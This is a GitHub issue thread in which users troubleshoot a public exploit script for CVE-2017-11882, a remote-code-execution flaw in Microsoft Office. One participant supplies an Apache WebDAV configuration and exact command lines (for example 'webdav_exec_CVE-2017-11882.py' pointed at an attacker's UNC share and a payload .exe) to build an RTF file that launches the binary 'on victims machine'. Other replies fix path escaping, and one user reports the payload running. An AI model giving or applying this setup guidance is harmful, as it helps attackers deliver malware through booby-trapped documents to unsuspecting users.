about exploit about cve-2017-11882 HOT 8 OPEN

Seems like that it uses UNC path, according to my understanding that is path to file shared on the network.

Although i am also interested to download file using http.

from cve-2017-11882.

Hi - i can't run thise exploite -
i use thise command
python webdav_exec_CVE-2017-11882.py -u \192.168.1.11\ff\sss.exe -e C:\Windows\system32\calc.exe -o test

and exploite massage

but not work word file

from cve-2017-11882.

Hello!

First of all you will need a properly configured HTTP server with WebDAV support (it's important obviously) in order to execute arbitrary binary on victims machine. It may be a tricky to configure HTTP server properly. I am using apache httpd on Centos 6 machine. Your setup should support anonymous authentication and file locking. So I have something like this in my httpd.conf

Alias /dav "/var/www/dav"
<IfModule dav_lock_module>
    DavLockDB "/var/www/dav"
</IfModule>
<Directory "/var/www/dav">
    Header set Access-Control-Allow-Origin "*"
    Dav On
</Directory>

Something may be missed, because now I cannot remember exactly how I configured it.

After you properly configured HTTP server, make sure that your WebDAV folder is accessible from the outside and executable files can be launched from this location. For example with Win+R shortcut.

WebDAV uses HTTP as transport and can be accessed with UNC path just like SMB.
That's why you should create sample exploit file with UNC paths:

python webdav_exec_CVE-2017-11882.py -u \\192.168.1.166\dav -e \\192.168.1.166\dav\1.exe -o test.rtf

In fact first UNC path can be just any UNC path which comply with command length limitation.
It is used to trigger start of WebClient service.

If everything is configured right you can launch your binary on a victims machine. Hope that helps.

I will update README.md ASAP and close this issue.

from cve-2017-11882.

@kkkkkii

can you explain that step by step
i edit the webdav and i can access files from another pc
but with word it's show me this error

https://image.prntscr.com/image/fSzsc4ruSCGFv31qxBInPQ.png

from cve-2017-11882.

@backtoback1

According to your screenshot, you missed one leading backslash. This can be caused by your shell environment. Maybe \ is considered as a special symbol by your shell where you execute this script. If you can run your payload with Win+R box with UNC path \\192.168.1.166\webdav\1.exe, then you can do this with exploit.

from cve-2017-11882.

I am still confused how it is working.

from cve-2017-11882.

hi guys for any reason the exploits does not works fine, maybe must use this: "//" and not "\" i have been this problem.
As seen when you use kali linux the correct way is this:

python webdav_exec_CVE-2017-11882.py -u //192.168.0.100/temp -e //192.168.0.100/temp/1.exe -o example.rtf

thanks good job!!

from cve-2017-11882.

Hi, so I connected my local PC to my cpanel thru webdisk and after some trials, I was able to get the exploit to work and execute payload on my local PC. But wen I run the same file on another PC which is not connected to my cpanel webdisk, it does not download the payload.

from cve-2017-11882.